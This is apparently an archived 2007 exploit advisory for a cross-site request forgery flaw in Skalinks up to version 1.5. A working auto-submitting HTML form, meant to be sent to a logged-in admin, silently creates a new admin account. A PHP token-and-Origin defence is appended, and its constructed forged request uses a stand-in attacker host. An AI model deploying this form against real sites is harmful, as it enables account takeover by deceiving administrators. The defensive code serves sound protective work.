skalinks-csrf.txt
Posted on 05 November 2007
Site:    www.hackinginside.altervista.org
Project: Skalinks <= 1_5 Cross Site Request Forgery Add Admin
Author:  Vincy
Email:   djvincy@hotmail.it

This code must be saved in an HTML page and sent to the site admin.
The admin will then add a new admin to MySQL with that info.
It works only if the admin is logged in.

-------------------------------------------------------------------------------------------
<form action="http://site.com/path/admin/admin_account.php" name="add_admin" method="post">
<input type="text" name="admin_name" value="[ NOME ]">
<input type="text" name="admin_password" value="[ PASSWORD ]">
<input type="text" name="admin_email" value="[ EMAIL ]">
<select name="admin_type"><option value="2">Super Editor</option></select>
<input type=hidden name="Add_admin" value="Add Admin">
</form>
<script>document.add_admin.submit()</script>
-------------------------------------------------------------------------------------------

# Vincy - Hacking Inside Crew
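
A defensive counterpart to the form above, as an added example that is not part of the original advisory and not Skalinks code: a per-session synchronizer token plus an Origin check that a handler such as admin/admin_account.php could enforce before adding an account. The function names, the csrf_token field and the site origin used here are assumptions.

```php
<?php
// Added example, not Skalinks code. Function names, the csrf_token field
// and the expected origin are assumptions made for illustration.

// Return the per-session token, creating it on first use.
function csrf_token(array &$session): string
{
    if (empty($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $session['csrf_token'];
}

// Hidden field to embed in the legitimate "Add Admin" form.
function csrf_field(array &$session): string
{
    $t = htmlspecialchars(csrf_token($session), ENT_QUOTES, 'UTF-8');
    return '<input type="hidden" name="csrf_token" value="' . $t . '">';
}

// True only for a same-origin POST that carries the session's token.
function csrf_check(array $session, array $post, array $server, string $expectedOrigin): bool
{
    if (($server['REQUEST_METHOD'] ?? '') !== 'POST') {
        return false;
    }
    // A cross-site auto-submitted form carries the foreign page's Origin.
    $origin = $server['HTTP_ORIGIN'] ?? null;
    if ($origin !== null && $origin !== $expectedOrigin) {
        return false;
    }
    $sent  = $post['csrf_token'] ?? '';
    $known = $session['csrf_token'] ?? '';
    // hash_equals compares in constant time; an empty token never matches.
    return is_string($sent) && is_string($known) && $known !== '' && hash_equals($known, $sent);
}

// Constructed requests: the POST from the advisory's form vs. a legitimate one.
$session   = [];
$token     = csrf_token($session);
$forged    = ['admin_name' => 'x', 'admin_type' => '2', 'Add_admin' => 'Add Admin'];
$legit     = $forged + ['csrf_token' => $token];
$srvForged = ['REQUEST_METHOD' => 'POST', 'HTTP_ORIGIN' => 'http://attacker.example'];
$srvLegit  = ['REQUEST_METHOD' => 'POST', 'HTTP_ORIGIN' => 'http://site.example'];

var_dump(csrf_check($session, $forged, $srvForged, 'http://site.example')); // forged request
var_dump(csrf_check($session, $legit, $srvLegit, 'http://site.example'));   // legitimate request
```

In a real handler the three arrays would be $_SESSION, $_POST and $_SERVER after session_start(), and the request is rejected before any database write when csrf_check() returns false.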